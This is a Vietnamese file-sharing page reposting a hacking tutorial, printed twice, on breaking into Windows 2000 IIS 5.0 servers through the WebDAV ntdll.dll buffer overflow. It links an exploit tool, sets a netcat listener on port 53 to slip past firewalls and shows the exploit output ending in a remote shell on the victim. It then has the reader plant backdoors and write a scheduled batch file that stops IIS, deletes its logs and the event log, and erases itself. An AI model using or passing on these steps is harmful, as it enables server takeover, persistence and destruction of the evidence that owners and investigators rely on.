Để trở thành hacker 4
Chia sẻ bởi Võ Duy Văn |
Ngày 14/10/2018 |
23
Chia sẻ tài liệu: Để trở thành hacker 4 thuộc Tư liệu tham khảo
Nội dung tài liệu:
Những hiểu biết cơ bản nhất để trở thành Hacker
trang này đã được đọc lần
50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính . Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , các bạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zip extract để ở trong C: Khai thác : + Tìm một trang Web dùng IIS 5.0 + Vào Dos , vào đặt NETCAT ở chế độ lắng nghe : C:>nx -vv -l -p 53 listening on [any] 53 ...
Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này . + Mở thêm một của sổ DOS nữa . + Ta sử dụng WebDAV vừa down về . c:wb.exe [padding=1,2,3...] VD :
C:> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1 [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] www.coromputer.net && undernet #coromputer Checking WebDav on `xxx.xxx.xxx.xxx` ... FOUND exploiting ntdll.dll through WebDav [ret: 0x00100010] Connecting... CONNECTED Sending evil request... SENT Now if you are lucky you will get a shell. + Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó : C:>nc -vv -l -p 53 listening on [any] 53 ... connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32> <-- ok đã thành công rùi.
+ Khi đã có shell rồi việc đầu tiên là ta sử dụng các lệnh trong Unix để khai thác , sau đó up lên server vài con backdoor , he he . ( Sử dụng con WinShell, Hack Defensed là ok rùi ) . + Sau khi làm xong ta sẽ xoá file log , để xác định file log ta thực hiện câu truy vấn sau : C:WINNTsystem32>reg query HKLMSYSTEMCurrentControlSetServicesW3SVCParameters /v LogFileDirectory ! REG.EXE VERSION 2.0
kết quả nó sẽ xuất hiện link để ta xác định file log : HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParameters LogFileDirectory REG_SZ C:WINNTSystem32LogFiles
He he , đường dẫn file log là C:WINNTSystem32LogFiles + Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoá file log này , ta đánh các lệnh sau : C:WINNTsystem32>echo iisreset /stop >a.bat ` tạm dừng server IIS C:WINNTsystem32>echo rd /q /s C:WINNTSystem32LogFiles >>a.bat ` xóa nhật kí của IIS C:WINNTsystem32>echo iisreset /start >>a.bat ` khởi động lại IIS C:WINNTsystem32>echo ce >>a.bat ` xóa nhật kí của Event Log C:WINNTsystem32>echo del a.bat >>a.bat ` xóa file a.bat
+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc : C:WINNTsystem32>net time xxx.xxx.xxx.xxx ` lấy thời gian hiện tại của máy chủ
Nó sẽ cho kết quả như VD sau : Current time at xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM The command completed successfully
Như vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho file a.bat làm việc sau 5 phút nữa bằng lệnh sau : C:WINNTsystem32>at 15:05 a.bat Added a new job with job ID = 1
Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳ vào thông số thời gian bạn đưa vào . Ta thoát khỏi máy chủ bằng lệnh : C:WINNTsystem32>exit `
trang này đã được đọc lần
50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính . Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , các bạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zip extract để ở trong C: Khai thác : + Tìm một trang Web dùng IIS 5.0 + Vào Dos , vào đặt NETCAT ở chế độ lắng nghe : C:>nx -vv -l -p 53 listening on [any] 53 ...
Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này . + Mở thêm một của sổ DOS nữa . + Ta sử dụng WebDAV vừa down về . c:wb.exe
C:> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1 [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] www.coromputer.net && undernet #coromputer Checking WebDav on `xxx.xxx.xxx.xxx` ... FOUND exploiting ntdll.dll through WebDav [ret: 0x00100010] Connecting... CONNECTED Sending evil request... SENT Now if you are lucky you will get a shell. + Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó : C:>nc -vv -l -p 53 listening on [any] 53 ... connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32> <-- ok đã thành công rùi.
+ Khi đã có shell rồi việc đầu tiên là ta sử dụng các lệnh trong Unix để khai thác , sau đó up lên server vài con backdoor , he he . ( Sử dụng con WinShell, Hack Defensed là ok rùi ) . + Sau khi làm xong ta sẽ xoá file log , để xác định file log ta thực hiện câu truy vấn sau : C:WINNTsystem32>reg query HKLMSYSTEMCurrentControlSetServicesW3SVCParameters /v LogFileDirectory ! REG.EXE VERSION 2.0
kết quả nó sẽ xuất hiện link để ta xác định file log : HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParameters LogFileDirectory REG_SZ C:WINNTSystem32LogFiles
He he , đường dẫn file log là C:WINNTSystem32LogFiles + Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoá file log này , ta đánh các lệnh sau : C:WINNTsystem32>echo iisreset /stop >a.bat ` tạm dừng server IIS C:WINNTsystem32>echo rd /q /s C:WINNTSystem32LogFiles >>a.bat ` xóa nhật kí của IIS C:WINNTsystem32>echo iisreset /start >>a.bat ` khởi động lại IIS C:WINNTsystem32>echo ce >>a.bat ` xóa nhật kí của Event Log C:WINNTsystem32>echo del a.bat >>a.bat ` xóa file a.bat
+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc : C:WINNTsystem32>net time xxx.xxx.xxx.xxx ` lấy thời gian hiện tại của máy chủ
Nó sẽ cho kết quả như VD sau : Current time at xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM The command completed successfully
Như vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho file a.bat làm việc sau 5 phút nữa bằng lệnh sau : C:WINNTsystem32>at 15:05 a.bat Added a new job with job ID = 1
Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳ vào thông số thời gian bạn đưa vào . Ta thoát khỏi máy chủ bằng lệnh : C:WINNTsystem32>exit `
* Một số tài liệu cũ có thể bị lỗi font khi hiển thị do dùng bộ mã không phải Unikey ...
Người chia sẻ: Võ Duy Văn
Dung lượng: 58,50KB|
Lượt tài: 0
Loại file: doc
Nguồn : Chưa rõ
(Tài liệu chưa được thẩm định)